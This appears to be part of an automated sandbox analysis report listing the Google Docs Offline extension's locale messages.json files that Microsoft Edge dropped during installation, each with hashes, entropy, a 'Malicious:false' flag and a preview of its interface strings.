                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
